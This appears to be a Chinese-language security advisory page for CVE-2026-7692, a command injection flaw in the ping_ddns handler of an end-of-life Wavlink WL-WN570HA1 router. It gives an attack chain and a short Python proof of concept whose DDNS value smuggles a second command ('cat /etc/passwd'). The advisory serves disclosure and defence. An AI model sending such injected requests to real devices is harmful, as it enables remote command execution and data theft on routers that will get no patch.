CVE-2026-7692 CVSS 6.3 中危

CVE-2026-7692 Wavlink命令注入漏洞

披露日期: 2026-05-03

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-7692

漏洞类型

命令注入

CVSS评分

6.3 中危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

Wavlink WL-WN570HA1

漏洞概述

Wavlink WL-WN570HA1路由器R70HA1 V1410_221110版本存在命令注入漏洞。该漏洞源于/cgi-bin/adm.cgi文件中的ping_ddns函数未能正确过滤DDNS参数，允许攻击者注入恶意命令。攻击者可在无需用户交互的情况下，仅需低权限即可远程发起攻击。由于该产品已停止支持，厂商已下架相关固件，目前缺乏官方补丁，存在较高安全风险。

技术细节

该漏洞属于操作系统命令注入类型。漏洞位于Wavlink路由器Web管理界面的`/cgi-bin/adm.cgi`脚本中，具体涉及`ping_ddns`功能模块。在处理用户提交的DDNS域名参数时，后端程序未对输入数据进行严格的校验或转义，直接将其传递给系统Shell执行。攻击者可以通过构造包含Shell元字符（如`;`、`|`、`&&`等）的恶意DDNS值，欺骗操作系统执行附加的任意系统指令。由于CVSS向量为AV:N/AC:L/PR:L/UI:N/S:U，表明该漏洞可被远程利用，攻击复杂度低。鉴于受影响版本R70HA1 V1410_221110已被厂商终止维护，官方将不会提供安全更新，这使得漏洞利用风险长期存在。

攻击链分析

STEP 1

侦察

攻击者扫描网络，识别出Wavlink WL-WN570HA1设备及其固件版本。

STEP 2

获取访问

攻击者获取设备的低权限访问凭证（如默认密码）或利用无需认证的接口（视具体配置而定）。

STEP 3

漏洞利用

攻击者向/cgi-bin/adm.cgi发送特制的POST请求，在DDNS参数中注入恶意Shell命令。

STEP 4

命令执行

后端脚本处理请求时，将恶意参数传递给系统Shell执行，导致攻击者获得远程代码执行权限。

STEP 5

控制与维持

攻击者利用执行权限下载后门、窃取数据或进一步横向移动。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests

# Target URL
url = "http://target-ip/cgi-bin/adm.cgi"

# Vulnerable parameters
payload_data = {
    "action": "ping_ddns",
    "DDNS": "google.com; cat /etc/passwd; #"  # Command Injection Payload
}

# Perform the request
try:
    response = requests.post(url, data=payload_data, timeout=5)
    if response.status_code == 200:
        print("Exploit sent successfully.")
        print("Response body:")
        print(response.text)
    else:
        print("Request failed with status code:", response.status_code)
except Exception as e:
    print("An error occurred:", e)

影响范围

Wavlink WL-WN570HA1 R70HA1 V1410_221110

防御指南

临时缓解措施

由于厂商已确认停止支持该产品并移除了相关固件，无法通过升级固件修复漏洞。建议用户采取网络隔离措施，限制对设备管理界面的访问，并尽快更换为仍在维护周期的网络设备。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表